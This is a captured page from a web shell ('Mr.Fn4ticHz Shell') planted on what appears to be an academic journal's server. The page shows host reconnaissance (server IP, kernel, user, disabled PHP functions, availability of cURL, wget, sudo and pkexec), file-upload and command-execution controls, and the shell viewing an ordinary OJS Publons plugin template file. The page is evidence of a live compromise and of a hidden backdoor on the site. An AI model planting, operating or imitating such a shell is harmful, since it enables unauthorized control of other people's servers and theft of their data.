Mr.Fn4ticHz Shell
Server IP : 10.10.92.66  /  Your IP : 104.23.243.84
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux jurnalpolinema 5.15.0-177-generic #187-Ubuntu SMP Sat Apr 11 22:54:33 UTC 2026 x86_64
User : jurnal ( 1001)
PHP Version : 7.4.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/noc/xx/templates/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/noc/xx/templates/settingsForm.tpl
{**
 * plugins/generic/publons/settingsForm.tpl
 *
 * Copyright (c) 2016 Publons Ltd.
 * Distributed under the GNU GPL v3.
 *
 * Publons plugin settings
 *
 *}
{strip}
    {assign var="pageTitle" value="plugins.generic.publons.list"}
    {include file="common/header.tpl"}
{/strip}
<script>
        {literal}

        $(document).ready(function(){
            $(".fancybox").fancybox()
        })
        {/literal}
</script>
<ul class="menu">
    <li><a href="{plugin_url path="connect"}">{translate key="plugins.generic.publons.settings.connection"}</a></li>
    <li class="current"><a href="{plugin_url path="settings"}">{translate key="plugins.generic.publons.settings.published"}</a></li>
</ul>
<br/>
<div id="publonsSettings">

    <table width="100%" class="listing">
        <tr>
            <td colspan="4" class="headseparator">&nbsp;</td>
        </tr>
        <tr class="heading" valign="bottom">
            <td width="1%">ID{*translate key="article.id"*}</td>
            <td width="10%">{sort_heading key="plugins.generic.publons.settings.publishedTable.reviewer" sort="reviewer"}</td>
            <td width="75%">{sort_heading key="article.title" sort="title"}</td>
            <td width="15%">{sort_heading key="plugins.generic.publons.settings.publishedTable.date.added" sort="date"}</td>
        </tr>
        <tr>
            <td colspan="4" class="headseparator">&nbsp;</td>
        </tr>

        {iterate from=publonsReviews item=publonsReview}
            <tr valign="top">
                <td>{$publonsReview->getArticleId()|escape}</td>
                <td>
                    {assign var="user" value=$userDAO->getById($publonsReview->getReviewerId())}
                    <a class="action" href="{url op="userProfile" path=$user->getId()}">{$user->getUsername()|escape}</a><br>
                    {$user->getFullName()|escape}<br>
                    {assign var=emailString value=$user->getFullName()|concat:" <":$user->getEmail():">"}
                    {url|assign:"url" page="user" op="email" to=$emailString|to_array redirectUrl=$currentUrl}
                    {icon name="mail" url=$url}
                </td>
                <td>
                    <a href="#text{$publonsReview->getArticleId()}" class="fancybox">{$publonsReview->getLocalizedTitle()|escape}</a><br>
                    <div style="display: none">
                        <div id="text{$publonsReview->getArticleId()}" >
                            <h3>{translate key="plugins.generic.publons.publishedTable.review"}</h3>
                            <p>{$publonsReview->getLocalizedContent()|escape}</p>
                        </div>
                    </div>
                </td>
                <td>{$publonsReview->getDateAdded()|default:"&mdash;"}</td>
            </tr>
            <tr>
                <td colspan="4" class="{if $publonsReviews->eof()}end{/if}separator">&nbsp;</td>
            </tr>
        {/iterate}
        {if $publonsReviews->wasEmpty()}
            <tr>
                <td colspan="4" class="nodata">{translate key="plugins.generic.publons.settings.publishedTable.noReviews"}</td>
            </tr>
            <tr>
                <td colspan="4" class="endseparator">&nbsp;</td>
            </tr>
        {else}
            <tr>
                <td colspan="1" align="left">{page_info iterator=$publonsReviews}</td>
                <td colspan="3" align="right">{page_links anchor="publonsReviews" name="publonsReviews" iterator=$publonsReviews}</td>
            </tr>
        {/if}
    </table>
</div>
{include file="common/footer.tpl"}

Mr.F4ticHz - 2022
Mr.Fn4tcHzam